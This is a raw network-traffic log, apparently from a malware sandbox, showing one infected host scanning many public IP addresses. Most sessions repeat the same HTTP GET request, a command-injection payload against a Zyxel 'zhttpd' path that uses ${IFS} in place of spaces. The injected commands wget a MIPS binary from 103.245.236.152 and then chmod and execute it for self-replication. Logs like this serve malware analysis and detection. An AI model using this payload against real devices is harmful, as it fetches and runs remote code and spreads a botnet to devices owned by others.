                                      Jan 14, 2024 15:51:06.769910097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9602192.168.2.144283686.191.220.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.769957066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9603192.168.2.1433156202.218.25.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770026922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9604192.168.2.1448832155.57.220.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770065069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9605192.168.2.145524665.151.82.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770114899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9606192.168.2.144400440.250.42.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770138979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9607192.168.2.1445752156.142.103.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770179033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9608192.168.2.1449226135.145.18.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770219088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9609192.168.2.1435480159.39.172.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770242929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9610192.168.2.1439434211.70.16.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770272970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9611192.168.2.144355673.226.103.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770303011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9612192.168.2.143424288.157.111.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770337105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9613192.168.2.1436102194.51.31.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770375013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9614192.168.2.1450546187.181.177.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770423889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9615192.168.2.143278635.1.155.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770488024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9616192.168.2.1458254205.238.140.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770534039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9617192.168.2.1449756211.67.77.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770576000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9618192.168.2.145274452.75.247.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770636082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9619192.168.2.1434812178.54.150.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770668030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9620192.168.2.145931418.24.31.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770715952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9621192.168.2.1444418201.251.179.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770749092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9622192.168.2.1448334109.134.32.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770803928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9623192.168.2.145461252.60.223.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770837069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9624192.168.2.1447300105.140.175.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770910025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9625192.168.2.145435280.27.152.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770953894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9626192.168.2.143581438.14.239.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.770968914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9627192.168.2.145066461.157.222.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771019936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9628192.168.2.1448816218.24.175.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771044970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9629192.168.2.144632024.189.145.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771100044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9630192.168.2.1441900222.54.109.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771142006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9631192.168.2.145881478.16.175.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771178961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9632192.168.2.1438026136.88.184.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771214008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9633192.168.2.1440208154.154.10.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771239996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9634192.168.2.145002841.178.242.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771296978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9635192.168.2.1434156203.138.164.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771334887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9636192.168.2.144504639.18.160.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771362066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9637192.168.2.143993220.61.206.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771394014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9638192.168.2.1458336119.81.87.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771445036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9639192.168.2.143458465.57.39.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771512032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9640192.168.2.1435880197.230.223.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771538019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9641192.168.2.1437454196.244.185.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771589994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9642192.168.2.146063236.226.211.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771620035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9643192.168.2.1437014102.130.18.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771678925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9644192.168.2.144482876.33.119.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771706104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9645192.168.2.1438922165.40.11.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771742105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9646192.168.2.143626680.145.243.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771770954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9647192.168.2.144228638.101.112.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771821976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9648192.168.2.1437256185.184.12.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771872044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9649192.168.2.145326442.217.3.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771888018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9650192.168.2.1441136115.33.197.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771922112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9651192.168.2.1442748109.79.165.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771958113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9652192.168.2.1446344222.113.32.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.771986008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9653192.168.2.1453586160.143.0.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.772026062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9654192.168.2.1447418199.104.0.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.772058964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9655192.168.2.1441754169.203.233.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.772089958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9656192.168.2.1447680112.200.178.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.772119999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9657192.168.2.1454852209.87.97.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.772164106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9658192.168.2.1439498156.30.143.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.772208929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9659192.168.2.143682440.222.237.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.772248030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9660192.168.2.144787477.190.178.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.772303104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9661192.168.2.1448852209.172.91.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:06.772325039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9662192.168.2.1444614114.199.32.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9663192.168.2.1455330110.118.71.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9664192.168.2.1433868216.29.179.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9665192.168.2.1436670198.200.19.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9666192.168.2.1451568211.232.180.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9667192.168.2.143675499.105.139.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9668192.168.2.144206294.43.36.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9669192.168.2.1459558192.233.180.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9670192.168.2.144643639.113.49.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
